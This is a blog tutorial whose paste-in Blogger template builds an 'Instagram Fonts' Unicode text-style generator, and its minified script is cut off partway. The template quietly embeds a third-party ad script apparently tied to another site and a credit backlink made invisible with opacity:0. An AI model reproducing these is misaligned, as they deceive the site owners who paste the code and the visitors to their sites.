Make a Text Fonts Generator Website in Your Blogger Website

Make a Text Fonts Generator Website in Your Blogger Website
Make a Text Fonts Generator Website in Your Blogger Website

Do you want to create a text fonts generator website in your Blogger website? If so, you're in luck! This article will show you how to do it in just a few simple steps.

A text fonts generator website is a website that allows users to generate different fonts for their text. This can be useful for a variety of purposes, such as creating custom logos, designing website headers, or simply making your text look more stylish.

To create a text fonts generator website in your Blogger website, you will need to:

  1. Make a New Blogger Website
  2. Go to Theme section in Blogger Dashboard
  3. Click on Edit HTML 
  4. Remove all the previous code
  5. Copy and Paste the code from below:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<html b:css='false' b:defaultwidgetversion='2' b:layoutsVersion='3' b:responsive='true' b:templateUrl='indie.xml' b:templateVersion='1.3.0' expr:dir='data:blog.languageDirection' expr:lang='data:blog.locale.language' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
  <b:attr name='xmlns' value=''/>
  <b:attr name='xmlns:b' value=''/>
  <b:attr name='xmlns:expr' value=''/>
  <b:attr name='xmlns:data' value=''/>


  <!--[ <head> Open ]-->
  &lt;head&gt;

 <b:if cond='data:view.isMultipleItems'>
    <b:if cond='data:view.isHomepage'>
      <!--[ Homepage title ]-->
      <title><data:blog.title.escaped/></title>
      <b:elseif cond='data:view.search.query'/>
      <!--[ Search title ]-->
      <title><data:messages.search/>: <data:view.search.query/></title>
      <b:elseif cond='data:view.search.label'/>
      <!--[ Label title ]-->
      <title><data:blog.pageName.escaped/> - <data:blog.title.escaped/></title>
      <b:elseif cond='data:view.isArchive'/>
      <!--[ Archive title ]-->
      <title>Blog archive in: <data:blog.pageName.escaped/></title>
      <b:else/>
      <title>Blog: <data:blog.title.escaped/></title>
    </b:if>
    <b:elseif cond='data:view.isError'/>
    <!--[ Error title ]-->
    <title>Error 404: Not Found</title>
    <b:else/>
    <!--[ SingleItem title ]-->
    <title><data:blog.pageName.escaped/> - <data:blog.title.escaped/></title>
  </b:if>

 <!--[ Meta for browser ]-->
  <meta charset='UTF-8'/>
  <meta content='width=device-width, initial-scale=1, user-scalable=1, minimum-scale=1, maximum-scale=5' name='viewport'/>
  <meta content='IE=edge' http-equiv='X-UA-Compatible'/>
  <meta content='max-image-preview:large' name='robots'/>

  <!--[ Link Canonical ]-->
  <link expr:href='data:blog.url.canonical' rel='canonical'/>

  <b:if cond='!data:view.isError'>
    <!--[ Browser data, description and keyword ]-->
    <b:if cond='data:blog.metaDescription'>
      <meta expr:content='data:blog.metaDescription.escaped' name='description'/>
      <b:elseif cond='data:view.isSingleItem'/>
      <meta expr:content='data:post.snippet.escaped snippet { length: 147, links: false, linebreaks: false, ellipsis: false }' name='description'/>
      <b:else/>
      <meta expr:content='data:blog.pageName.escaped ? data:blog.pageName.escaped : data:blog.title' name='description'/>
    </b:if>
    <meta expr:content='data:blog.title.escaped + &quot;, &quot; + data:blog.pageName.escaped + &quot;, Keyword_1, Keyword_2, Keyword_3 &quot;' name='keywords'/>
    <b:tag cond='data:view.isPost' expr:href='resizeImage(data:blog.postImageUrl, 0)' name='link' rel='image_src'/>

    <!--[ Generator and rrs ]-->
    <meta content='blogger' name='generator'/>
    <link expr:href='data:blog.homepageUrl.canonical + &quot;feeds/posts/default&quot;' expr:title='data:blog.title + &quot; » Atom&quot;' rel='alternate' type='application/atom+xml'/>
    <link expr:href='data:blog.homepageUrl.canonical + &quot;feeds/posts/default?alt=rss&quot;' expr:title='data:blog.title + &quot; » Feed&quot;' rel='alternate' type='application/rss+xml'/>
    <link expr:href='data:blog.homepageUrl.canonical + &quot;feeds/comments/default?alt=rss&quot;' expr:title='data:blog.title + &quot; » Comments Feed&quot;' rel='alternate' type='application/rss+xml'/>

    <!--[ Theme Color ]-->
    <meta expr:content='data:skin.vars.themeColor' name='theme-color'/>
    <meta expr:content='data:skin.vars.themeColor' name='msapplication-navbutton-color'/>
    <meta expr:content='data:skin.vars.themeColor' name='apple-mobile-web-app-status-bar-style'/>
    <meta expr:content='yes' name='apple-mobile-web-app-capable'/>

    <!--[ Favicon ]-->
    <link expr:href='data:blog.blogspotFaviconUrl' rel='apple-touch-icon' sizes='120x120'/>
    <link expr:href='data:blog.blogspotFaviconUrl' rel='apple-touch-icon' sizes='152x152'/>
    <link expr:href='data:blog.blogspotFaviconUrl' rel='icon' type='image/x-icon'/>
    <link expr:href='data:blog.blogspotFaviconUrl' rel='shortcut icon' type='image/x-icon'/>

    <!--[ Open graph ]-->
    <meta expr:content='data:blog.pageName.escaped ? data:blog.pageName.escaped : data:blog.title.escaped' property='og:title'/>
    <meta expr:content='data:blog.canonicalUrl' property='og:url'/>
    <meta expr:content='data:blog.title.escaped' property='og:site_name'/>
    <b:if cond='data:view.isMultipleItems'>
      <meta content='website' property='og:type'/>
      <b:if cond='data:blog.metaDescription'>
        <meta expr:content='data:blog.metaDescription.escaped' property='og:description'/>         
        <b:else/>
        <meta expr:content='data:blog.pageName.escaped ? data:blog.pageName.escaped : data:blog.title' property='og:description'/>
      </b:if>
      <b:else/>
      <meta content='article' property='og:type'/>
      <b:if cond='data:blog.metaDescription'>
        <meta expr:content='data:blog.metaDescription.escaped' property='og:description'/>            
        <b:else/>
        <meta expr:content='data:post.snippet.escaped snippet { length: 147, links: false, linebreaks: false, ellipsis: false }' property='og:description'/>
      </b:if>
    </b:if>
    <meta expr:content='data:blog.pageName.escaped ? data:blog.pageName.escaped : data:blog.title.escaped' property='og:image:alt'/>
    <b:if cond='data:blog.postImageUrl'>
      <meta expr:content='resizeImage(data:blog.postImageUrl, 0)' property='og:image'/>
      <b:else/>
      <meta content='Add_your_image_url_here' property='og:image'/>
    </b:if>

    <!--[ Twitter Card ]-->
    <meta expr:content='data:blog.pageName.escaped ? data:blog.pageName.escaped : data:blog.title.escaped' name='twitter:title'/>
    <meta expr:content='data:blog.canonicalUrl' name='twitter:url'/>
    <b:if cond='data:view.isMultipleItems'>
      <b:if cond='data:blog.metaDescription'>
        <meta expr:content='data:blog.metaDescription.escaped' name='twitter:description'/>         
        <b:else/>
        <meta expr:content='data:blog.pageName.escaped ? data:blog.pageName.escaped : data:blog.title' name='twitter:description'/>
      </b:if>
      <b:else/>
      <b:if cond='data:blog.metaDescription'>
        <meta expr:content='data:blog.metaDescription.escaped' name='twitter:description'/>            
        <b:else/>
        <meta expr:content='data:post.snippet.escaped snippet { length: 147, links: false, linebreaks: false, ellipsis: false }' name='twitter:description'/>
      </b:if>
    </b:if>
    <meta content='summary_large_image' name='twitter:card'/>
    <meta expr:content='data:blog.pageName.escaped ? data:blog.pageName.escaped : data:blog.title.escaped' name='twitter:image:alt'/>
    <b:if cond='data:blog.postImageUrl'>
      <meta expr:content='resizeImage(data:blog.postImageUrl, 0)' name='twitter:image:src'/>
      <b:else/>
      <meta content='Add_your_image_url_here' name='twitter:image:src'/>
    </b:if> </b:if>

<b:skin version='1.3.0'><![CDATA[
/*

]]></b:skin>
  <b:section id='protemplates'/>
  <!-- Head close-->
  &lt;!--<head/><b:if cond='!data:blog.adsenseClientId'>--&gt;&lt;/head&gt;</b:if>
<body>
  <!--[if lte IE 9]>
    <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience and security.</p>
  <![endif]-->

  <style>
    body * {
      font-family: &#39;Open Sans&#39;, sans-serif; 
      color: #222;
    }
    body {
      background:#eee;  
    }
    #main {
      /*margin: 0 auto;
      max-width: 800px;
      width: 100%; 
      box-sizing: border-box;*/
      padding: 1em;
    }
    .content-box {
      box-shadow: 0 1px 1px rgba(0, 0, 0, 0.3);
      border-radius: 2px;
      background:white;
      margin: 0 auto;
      margin-top: 1em;
      max-width: 800px;
      width: 100%;
      box-sizing: border-box;
    }
    #input {
      resize: none;
      border: none;
      outline: none;
      width: 100%;
      height: 100%;
      padding:1em;
      font-size: 1.25em;
    }
    #input-wrapper {
      height: 9em;
      overflow: hidden;
      margin-top:0;
    }
    #output-wrapper {
      height: fit-content;
      padding: 1em;
    }
    #output {
      font-size: 1.4em;
      word-break: break-word;
    }
    #description p:last-child {
      margin-bottom: 0; 
    }
    #description h1:first-child {
      margin-top: 0; 
    }
    #background {
      z-index:-1;
      position:fixed;
      top:0;
      left:0;
      right:0;
      bottom:0;
      background-size: 20vw;
      background-image:url(https://cdn.glitch.com/249e1d47-8b44-42f1-ab83-8375d511040a%2Findex.png?1534486436972);
    }
    #logo {
      text-align: center;
      font-size: 5.5vw;
      font-family: &#39;Pacifico&#39;, cursive;
      color: white;
      text-shadow: 0px 1px 2px #444;
      margin-top: 0.1em;
      margin-bottom: 0.6em; 
    }

    #description *:not(pre) &gt; code {
      background: #f1f1f1;
      font-family: monospace;
      font-size: 1.1em;
      padding: 0.3em; 
    }
    #description pre {
      overflow-x: auto;
      overflow-y: hidden;
      padding: 0.5em;
      background: #f1f1f1;
      font-family: monospace;
    }
    @media only screen and (max-width: 850px) {
      #logo {
        font-size: 10.5vw;
      }
    }
    @media only screen and (max-width: 650px) {
      #output {
        font-size: 1em;
      }
    }
  </style>

  <div id='background'/>

  <div id='main'>

    <p id='logo' style='display:none;'>Instagram Fonts</p>

    <div class='content-box' id='input-wrapper'>
      <textarea id='input' placeholder='Type or paste your text here :)' value=''/>
    </div>
    <div class='content-box' id='output-wrapper' style='display:none;'>
      <div id='output'><p style='margin: 0;opacity: 0.7;'><span style='display:inline-block; width:max-content;'>ᕕ( ᐛ )ᕗ</span></p></div>
    </div>
    <div class='content-box' style='background:unset; border:none; box-shadow:none; max-width: 970px; min-height:280px; text-align: center;'>

  <script async='async' src='//tags-cdn.deployads.com/a/igfonts.io.js'/>
 <!-- adsense ads code here -->
    </div>

    <div class='content-box' id='description' style='padding:1em;'>
      <div><h1 id='instagram-fonts'>Instagram Fonts</h1>
<p>Welcome! This site allows you to generate text fonts that you can copy and paste into your Instagram bio. It&#39;s useful for generating Instagram bio symbols to make your profile stand out and have a little bit of individuality. After typing some text into the input box, you can keep clicking the &quot;show more fonts&quot; button and it&#39;ll keep generating an infinite number of different Instagram font variations, or you can use one of the &quot;tried and true&quot; fonts like the cursive text, or the other stylish text fonts - i.e. the ones that are a bit &quot;neater&quot; than the others because they use a set of symbols that are closer to the normal alphabet, and are more consistent in their style.</p>
<p>The site works by generating a bunch of different styles using a large range of different <a href='https://en.wikipedia.org/wiki/Unicode'>Unicode</a> characters. So technically you&#39;re not actually generating <em>fonts</em>, but instead I guess you could say you&#39;re generating Instagram-compatible Unicode glyphs :) Want to learn more about Unicode? Read on...</p>
<h2 id='unicode'>Unicode</h2>
<p>Computers must store all data in a binary format - that is, with <a href='https://en.wikipedia.org/wiki/Binary_code'>zeros and ones</a>. So each letter that you&#39;re reading right now is stored on my server as a series of zeros and ones. That needs to go from my server to your browser, and your browser needs to understand what those zeros and ones are referring to.In the early days of computing, everyone had their own ideas about which binary codes should refer to which textual characters - there was no universal standard saying 01100001=a, 01100010=b, etc., but that changed in the 1980s with the formation of Unicode. Unicode is an international standards body that works towards a universal specification for text characters. Before Unicode was formed, everyone had their own ways of storing and rendering text, and so whenever two programs from different programmers or organisations had to &quot;talk&quot; to one another, they&#39;d have to build a &quot;translator&quot; so that they could understand which codes referred to which textual characters.</p>
<p>Unicode had a bit of a tough time though, because all the different organisations didn&#39;t want to change their whole system around just to comply with this new spec. So Unicode had to introduce a bunch of different symbol sets to support legacy systems. Over time, the number of symbols grew into the tens of thousands, and today we&#39;re moving into the hundreds of thousands. Emojis are also text symbols, and so the new emojis that are appearing all the time are coming out of the Unicode working group.</p>
<p>So that&#39;s how we ended up with such a large and strange/fun array of symbols, and that&#39;s the reason you&#39;re here! I&#39;ve put together a bunch of fonts for Instagram that should be fund to play with and use for your bio. You may want to mix and match certain parts from different fonts.</p>
<h2 id='text-fonts-or-text-symbols-'>Text Fonts or Text Symbols?</h2>
<p>ASCII characters are the first 128 symbols of Unicode, and these are the things that you&#39;re reading right now. But there are far more than 128 symbols in Unicode, and it just so happens that there are quite a few that look a bit like the normal Latin alphabet (i.e. that look like English text). We can take advantage of that to make &quot;pseudo-alphabets&quot; which resemble normal ASCII text, but which have certain differences - such as being bolder, or italic, or even upside down! These &quot;alphabets&quot; often aren&#39;t perfect - they&#39;re basically &quot;Unicode hacks&quot; which take advantage of various symbols from different sets all throughout the 100k+ symbols in the standard.</p>
<p>The term &quot;font&quot; actually refers to a set of graphics that correspond to some or all of the Unicode glyphs. You&#39;ve probably heard of &quot;Comic Sans&quot; and &quot;Arial&quot; - these are fonts. What you&#39;re copying and pasting above are actually <em>symbols</em> that exist in <em>every font</em>. So the cursive text and other fancy letters that you&#39;re seeing above are actually <em>separate character</em>, just like &quot;a&quot; and &quot;b&quot; are separate characters.</p>
<h2 id='copy-and-paste'>Copy and Paste</h2>
<p>So why doesn it matter that they&#39;re separate characters? Who cares? Well, you do! Because if they weren&#39;t (i.e. if they were just normal fonts), then you wouldn&#39;t be able to copy and paste them! You can&#39;t copy and paste some Comic Sans into your Instagram bio because the symbols the you&#39;d be copying would just be normal ASCII characters, and the fact that they&#39;re rendered in one font on one website doesn&#39;t mean that they&#39;ll appear as that same font on another - it&#39;s up to the website owner to decide what fonts they use on their website. However, if there&#39;s a set of unicode characters that <em>looks</em> like a specific font, or has a particular style (e.g. bold, italic, cursive, etc.), then we can use them to &quot;emulate&quot; a font that will work across different websites when you copy and paste those &quot;fonts&quot;.</p>
<p>So really, if I were to be really pedantic, this site should be called &quot;pseudo instagram fonts&quot;. But the current name gets the point across, and it&#39;s nice and short :) So, anyway, that&#39;s why you&#39;re able to copy and paste these fonts into Instagram.</p>
<h2 id='compatability'>Compatability</h2>
<p>One final note: You may notice that some of the fonts don&#39;t work on Instagram. Unfortunately Instagram filters out some of the fancy letters and symbols - probably because they don&#39;t want people to abuse certain Unicode stuff like the excessive <a href='https://en.wikipedia.org/wiki/Diacritic'>diacritics</a> used in the &quot;glitch text&quot; font that you&#39;ll see in the list.</p>
<p>Okay, that&#39;s all for now folks! I hope you find all these Instagram fonts useful! You can keep clicking that &quot;show more&quot; button, and it&#39;ll keep randomizing all the different symbol alphabets all day long. If you have a stylish text font that you&#39;ve created, or you want to share some feedback, please share it here</p>. <p>I&#39;m always playing around building new websites, so if you&#39;ve got any other ideas for text generators or text fonts, feel free to share those too. 𝒯𝒽𝒶𝓃𝓀𝓈 𝒻𝑜𝓇 𝓈𝓉𝑜𝓅𝓅𝒾𝓃𝑔 𝒷𝓎! ٩( ᐛ )و</p>
</div>
      <hr style='margin-top: 1.25rem;'/>
      <p>Please note that this site uses cookies to personalise content and adverts, to provide social media features, and to analyse web traffic. <a href='https://www.protemplates.in/'>Click here</a> for more information.</p>
    </div>

  </div>
  <a class='make-a-font-link' href='https://www.protemplates.in/' id='makeAFontLink' style='opacity:0; position:fixed;bottom:1rem;right:1rem;border-radius: 3rem;background: #00c9d3;color:white;text-decoration:none; padding: 0.6rem 1rem;' target='_blank'>Design By Pro Templates</a>
  <style>
    .make-a-font-link:hover {
      background:#00b9c2 !important;
     opacity:0;

    }
    @media screen and (max-width: 992px) {
      #makeAFontLink {
        font-size: 78%;
        padding: 0.3rem 0.5rem;
      }
    }
  </style>

  <br/>

 <script>//<![CDATA[ 
    var input = document.querySelector("#input");
    var output = document.querySelector("#output");
    !function(){let t;document.querySelector("#output").style.whiteSpace="pre-wrap",document.querySelector("#input").addEventListener("input",function(){clearTimeout(t),t=setTimeout(r,400)}),document.querySelector("#input").addEventListener("paste",r);const n=new function(){for(i in this.tools={flip:{init:function(){for(i in this.map)this.map[this.map[i]]=i},encode:function(t){for(var n,i=[],r=0,o=t.length;o>r;r++)n=t.charAt(r),r>0&&("̤"==n||"̗"==n||"̖"==n||"̮"==n)?(n=this.map[t.charAt(r-1)+n],i.pop()):void 0===(n=this.map[n])&&(n=t.charAt(r)),i.push(n);return i.reverse().join("")},decode:function(t){for(var n,i=[],r=0,o=t.length;o>r;r++)n=t.charAt(r),r>0&&("̤"==n||"̗"==n||"̖"==n||"̮"==n)?(n=this.map[t.charAt(r-1)+n],i.pop()):void 0===(n=this.map[n])&&(n=t.charAt(r)),i.push(n);return i.reverse().join("")},map:{a:"ɐ",b:"q",c:"ɔ",d:"p",e:"ǝ",f:"ɟ",g:"ɓ",h:"ɥ",i:"ı",j:"ɾ",k:"ʞ",l:"l",m:"ɯ",n:"u",r:"ɹ",t:"ʇ",v:"ʌ",w:"ʍ",y:"ʎ",A:"∀",B:"ᙠ",C:"Ɔ",D:"ᗡ",E:"Ǝ",F:"Ⅎ",G:"⅁",J:"ſ",K:"⋊",L:"˥",M:"W",P:"Ԁ",Q:"Ό",R:"ᴚ",T:"⊥",U:"∩",V:"Λ",Y:"⅄",1:"⇂",2:"ᄅ",3:"Ɛ",4:"ㄣ",5:"ގ",6:"9",7:"ㄥ","&":"⅋",".":"˙",'"':"„",";":"؛","[":"]","(":")","{":"}","?":"¿","!":"¡","'":",","<":">","‾":"_","¯":"_","‿":"⁀","⁅":"⁆","∴":"∵","\r":"\n","ß":"ᙠ","̈":"̤","ä":"ɐ̤","ö":"o̤","ü":"n̤","Ä":"∀̤","Ö":"O̤","Ü":"∩̤","´":" ̗","é":"ǝ̗","á":"ɐ̗","ó":"o̗","ú":"n̗","É":"Ǝ̗","Á":"∀̗","Ó":"O̗","Ú":"∩̗","`":" ̖","è":"ǝ̖","à":"ɐ̖","ò":"o̖","ù":"n̖","È":"Ǝ̖","À":"∀̖","Ò":"O̖","Ù":"∩̖","^":" ̮","ê":"ǝ̮","â":"ɐ̮","ô":"o̮","û":"n̮","Ê":"Ǝ̮","Â":"∀̮","Ô":"O̮","Û":"∩̮"}},mirror:{init:function(){for(i in this.map)this.map[this.map[i]]=i},encode:function(t){for(var n,i=[],r=[],o=0,e=t.length;e>o;o++)n=t.charAt(o),o>0&&("̈"==n||"̀"==n||"́"==n||"̂"==n)?(n=this.map[t.charAt(o-1)+n],i.pop()):void 0===(n=this.map[n])&&(n=t.charAt(o)),"\n"==n?(r.push(i.reverse().join("")),i=[]):i.push(n);return r.push(i.reverse().join("")),r.join("\n")},decode:function(t){for(var n,i=[],r=[],o=0,e=t.length;e>o;o++)n=t.charAt(o),o>0&&("̈"==n||"̀"==n||"́"==n||"̂"==n)?(n=this.map[t.charAt(o-1)+n],i.pop()):void 0===(n=this.map[n])&&(n=t.charAt(o)),"\n"==n?(r.push(i.reverse().join("")),i=[]):i.push(n);return r.push(i.reverse().join("")),r.join("\n")},map:{a:"ɒ",b:"d",c:"ɔ",e:"ɘ",f:"Ꮈ",g:"ǫ",h:"ʜ",j:"ꞁ",k:"ʞ",l:"|",n:"ᴎ",p:"q",r:"ɿ",s:"ꙅ",t:"ƚ",y:"ʏ",z:"ƹ",B:"ᙠ",C:"Ɔ",D:"ᗡ",E:"Ǝ",F:"ꟻ",G:"Ꭾ",J:"Ⴑ",K:"⋊",L:"⅃",N:"Ͷ",P:"ꟼ",Q:"Ọ",R:"Я",S:"Ꙅ",Z:"Ƹ",1:"",2:"",3:"",4:"",5:"",6:"",7:"","&":"",";":"","[":"]","(":")","{":"}","?":"⸮","<":">","ä":"ɒ̈","ß":"ᙠ","´":"`","é":"ɘ̀","á":"ɒ̀","ó":"ò","ú":"ù","É":"Ǝ̀","Á":"À","Ó":"Ò","Ú":"Ù","`":"´","è":"ɘ́","à":"ɒ́","È":"Ǝ́","ê":"ɘ̂","â":"ɒ̂","Ê":"Ǝ̂","Ø":"ᴓ","ø":"ᴓ"}},creepify:{init:function(){for(var t=768;789>=t;t++)this.diacriticsTop.push(String.fromCharCode(t));for(t=790;819>=t;t++)794!=t&&795!=t&&this.diacriticsBottom.push(String.fromCharCode(t));for(this.diacriticsTop.push(String.fromCharCode(794)),this.diacriticsTop.push(String.fromCharCode(795)),t=820;824>=t;t++)this.diacriticsMiddle.push(String.fromCharCode(t));for(t=825;828>=t;t++)this.diacriticsBottom.push(String.fromCharCode(t));for(t=829;836>=t;t++)this.diacriticsTop.push(String.fromCharCode(t));this.diacriticsTop.push(String.fromCharCode(836)),this.diacriticsBottom.push(String.fromCharCode(837)),this.diacriticsTop.push(String.fromCharCode(838)),this.diacriticsBottom.push(String.fromCharCode(839)),this.diacriticsBottom.push(String.fromCharCode(840)),this.diacriticsBottom.push(String.fromCharCode(841)),this.diacriticsTop.push(String.fromCharCode(842)),this.diacriticsTop.push(String.fromCharCode(843)),this.diacriticsTop.push(String.fromCharCode(844)),this.diacriticsBottom.push(String.fromCharCode(845)),this.diacriticsBottom.push(String.fromCharCode(846)),this.diacriticsTop.push(String.fromCharCode(848)),this.diacriticsTop.push(String.fromCharCode(849)),this.diacriticsTop.push(String.fromCharCode(850)),this.diacriticsBottom.push(String.fromCharCode(851)),this.diacriticsBottom.push(String.fromCharCode(852)),this.diacriticsBottom.push(String.fromCharCode(853)),this.diacriticsBottom.push(String.fromCharCode(854)),this.diacriticsTop.push(String.fromCharCode(855)),this.diacriticsTop.push(String.fromCharCode(856)),this.diacriticsBottom.push(String.fromCharCode(857)),this.diacriticsBottom.push(String.fromCharCode(858)),this.diacriticsTop.push(String.fromCharCode(859)),this.diacriticsBottom.push(String.fromCharCode(860)),this.diacriticsTop.push(String.fromCharCode(861)),this.diacriticsTop.push(String.fromCharCode(861)),this.diacriticsBottom.push(String.fromCharCode(863)),this.diacriticsTop.push(String.fromCharCode(864)),this.diacriticsTop.push(String.fromCharCode(865))},encode:function(t){var n,r="";for(i in t){if(n=t[i],this.options.middle&&(n+=this.diacriticsMiddle[Math.floor(Math.random()*this.diacriticsMiddle.length)]),this.options.top)for(var o=this.diacriticsTop.length-1,e=0,a=this.options.maxHeight-Math.random()*(this.options.randomization/100*this.options.maxHeight);a>e;e++)n+=this.diacriticsTop[Math.floor(Math.random()*o)];if(this.options.bottom){var s=this.diacriticsBottom.length-1;for(e=0,a=this.options.maxHeight-Math.random()*(this.options.randomization/100*this.options.maxHeight);a>e;e++)n+=this.diacriticsBottom[Math.floor(Math.random()*s)]}r+=n}return r},decode:function(t){var n,r="";for(i in t)(768>(n=t[i].charCodeAt(0))||n>865)&&(r+=t[i]);return r},diacriticsTop:[],diacriticsMiddle:[],diacriticsBottom:[],options:{top:!0,middle:!0,bottom:!0,maxHeight:15,randomization:100}},bubbles:{init:function(){for(var t=49;57>=t;t++)this.map[String.fromCharCode(t)]=String.fromCharCode(t+9263);for(this.map[0]="⓪",t=65;90>=t;t++)this.map[String.fromCharCode(t)]=String.fromCharCode(t+9333);for(t=97;122>=t;t++)this.map[String.fromCharCode(t)]=String.fromCharCode(t+9327);for(t in this.map)this.mapInverse[this.map[t]]=t},encode:function(t){var n,r="",o=!0;for(i in t)void 0===(n=this.map[t[i]])&&(t[i].charCodeAt(0)>=33?(n=t[i]+String.fromCharCode(8413),o||(n=String.fromCharCode(8239)+String.fromCharCode(160)+String.fromCharCode(160)+String.fromCharCode(8239)+n)):n=t[i]),r+=n,o="\n"==n;return r},decode:function(t){var n,r="",o="";for(i in t)r+=void 0===(n=this.mapInverse[t[i]])?t[i]:n;for(i in r)160!=(n=r[i].charCodeAt(0))&&8239!=n&&8413!=n&&(o+=r[i]);return o},map:{},mapInverse:{}},squares:{init:function(){},encode:function(t){var n,r="",o=!0;for(i in t)t[i].charCodeAt(0)>=33?(n=t[i]+String.fromCharCode(8414),o||(n=String.fromCharCode(8239)+String.fromCharCode(160)+String.fromCharCode(160)+String.fromCharCode(8239)+n)):n=t[i],r+=n,o="\n"==n;return r},decode:function(t){var n,r="";for(i in t)160!=(n=t[i].charCodeAt(0))&&8239!=n&&8414!=n&&(r+=t[i]);return r}},roundsquares:{init:function(){},encode:function(t){var n,r="",o=!0;for(i in t)t[i].charCodeAt(0)>=33?(n=t[i]+String.fromCharCode(8419),o||(n=String.fromCharCode(160)+String.fromCharCode(160)+String.fromCharCode(160)+n)):n=t[i],r+=n,o="\n"==n;return r},decode:function(t){var n,r="";for(i in t)160!=(n=t[i].charCodeAt(0))&&8239!=n&&8419!=n&&(r+=t[i]);return r}},bent:{init:function(){for(i in this.map)this.map[this.map[i]]=i},encode:function(t){for(var n,i="",r=0,o=t.length;o>r;r++)void 0===(n=this.map[t.charAt(r)])&&(n=t.charAt(r)),i+=n;return i},decode:function(t){for(var n,i="",r=0,o=t.length;o>r;r++)void 0===(n=this.map[t.charAt(r)])&&(n=t.charAt(r)),i+=n;return i},map:{a:"ą",b:"ҍ",c:"ç",d:"ժ",e:"ҽ",f:"ƒ",g:"ց",h:"հ",i:"ì",j:"ʝ",k:"ҟ",l:"Ӏ",m:"ʍ",n:"ղ",o:"օ",p:"ք",q:"զ",r:"ɾ",s:"ʂ",t:"է",u:"մ",v:"ѵ",w:"ա",x:"×",y:"վ",z:"Հ",A:"Ⱥ",B:"β",C:"↻",D:"Ꭰ",E:"Ɛ",F:"Ƒ",G:"Ɠ",H:"Ƕ",I:"į",J:"ل",K:"Ҡ",L:"Ꝉ",M:"Ɱ",N:"ហ",O:"ට",P:"φ",Q:"Ҩ",R:"འ",S:"Ϛ",T:"Ͳ",U:"Ա",V:"Ỽ",W:"చ",X:"ჯ",Y:"Ӌ",Z:"ɀ",0:"⊘",1:"������",2:"ϩ",3:"Ӡ",4:"५",5:"Ƽ",6:"Ϭ",7:"7",8:"������",9:"९","&":"⅋","(":"{",")":"}","{":"(","}":")","ä":"ą̈","ö":"օ̈","ü":"մ̈","Ä":"Ⱥ̈","Ö":"ට̈","Ü":"Ա̈","é":"ҽ́","á":"ą́","ó":"օ́","ú":"մ́","É":"Ɛ́","Á":"Ⱥ́","Ó":"ට́","Ú":"Ա́","è":"ҽ̀","à":"ą̀","ò":"օ̀","ù":"մ̀","È":"Ɛ̀","À":"Ⱥ̀","Ò":"ට̀","Ù":"Ա̀","ê":"ҽ̂","â":"ą̂","ô":"օ̂","û":"մ̂","Ê":"Ɛ̂","Â":"Ⱥ̂","Ô":"ට̂","Û":"Ա̂"}},tiny:{init:function(){for(i in this.map)this.map[this.map[i]]=i},encode:function(t){for(var n,i="",r=0,o=(t=t.toUpperCase()).length;o>r;r++)void 0===(n=this.map[t.charAt(r)])&&(n=t.charAt(r)),i+=n;return i},decode:function(t){for(var n,i="",r=0,o=t.length;o>r;r++)void 0===(n=this.map[t.charAt(r)])&&(n=t.charAt(r)),i+=n;return i},map:{A:"ᴀ",B:"ʙ",C:"ᴄ",D:"ᴅ",E:"ᴇ",F:"ꜰ",G:"ɢ",H:"ʜ",I:"ɪ",J:"ᴊ",K:"ᴋ",L:"ʟ",M:"ᴍ",N:"ɴ",O:"ᴏ",P:"ᴘ",Q:"Q",R:"ʀ",S:"ꜱ",T:"ᴛ",U:"ᴜ",V:"ᴠ",W:"ᴡ",X:"x",Y:"ʏ",Z:"ᴢ"}}},this.tools)this.tools[i].init();this.getHTML=function(t){for(var n,i="",r=!0,o=0,e=0,a=0,s=t.length;s>a;a++)10==(n=t.charCodeAt(a))||13==n?(i+="<br>\n",r=!0):32==n?r?(i+=" ",r=!1):(i+=" ",r=!0):(n>=55296&&56319>=n?(o=n,e=0):o>0?(n>=56320&&57343>=n&&(e=1024*(o-55296)+(n-56320)+65536),o=0):e=n,0!=e&&(i+="&#x"+e.toString(16)+";",r=!0));return i}};function r(){let t=document.querySelector("#input").value.trim();if(""!==t){var i="";i+=h(D,t)+"\n\n",i+=h(k,t)+"\n\n",i+=ot(t)+"\n\n",i+=h(K,t)+"\n\n",i+=it(t)+"\n\n",i+=h(u,t)+"\n\n",i+=h(L,t)+"\n\n",i+=h(X,t)+"\n\n",i+=V(t)+"\n\n",i+=n.tools.tiny.encode(t)+"\n\n",i+=n.tools.flip.encode(t)+"\n\n",i+=n.tools.roundsquares.encode(t)+"\n\n",i+=n.tools.squares.encode(t)+"\n\n",i+=h(C,t)+"\n\n",i+=n.tools.mirror.encode(t)+"\n\n",i+=n.tools.creepify.encode(t)+"\n\n",i+=h(F,t)+"\n\n",i+=h(q,t)+"\n\n",i+=h(z,t)+"\n\n",i+=n.tools.bubbles.encode(t)+"\n\n",i+=h(H,t)+"\n\n",i+=h(A,t)+"\n\n",i+=h(v,t)+"\n\n",i+=h(g,t)+"\n\n",i+=h(f,t)+"\n\n",i+=h(p,t)+"\n\n",i+=h(y,t)+"\n\n",i+=h(M,t)+"\n\n",i+=h(j,t)+"\n\n",i+=h(w,t)+"\n\n",i+=h(b,t)+"\n\n",i+=h(S,t)+"\n\n",i+=h(I,t)+"\n\n",i+=h(Z,t)+"\n\n",i+=h(B,t)+"\n\n",i+=h(T,t)+"\n\n",i+=h(l,t)+"\n\n",i+=h(m,t)+"\n\n",i+=function(t){return t.replace(/([^\s])/g,"【$1】")}(t)+"\n\n",i+=function(t){return t.replace(/([^\s])/g,"『$1』")}(t)+"\n\n",i+=function(t){return"≋"+t.split("").join("≋")+"≋"}(t)+"\n\n",i+=function(t){return"░"+t.split("").join("░")+"░"}(t)+"\n\n",i+=function(t){return"(っ◔◡◔)っ ♥ "+t+" ♥"}(t)+"\n\n",i+=function(t){var n=t.split(" ").length;t=h(e,t);var i=function(t){t||(t=1);for(var n="リサフランク現代のコンピュ竹内 まりや若者が履く流行のスニーカー真夜中のドアホットドッグマスターストライカーソニーブギ新しい日の誕生ライフ - ヒスイ蒸気波 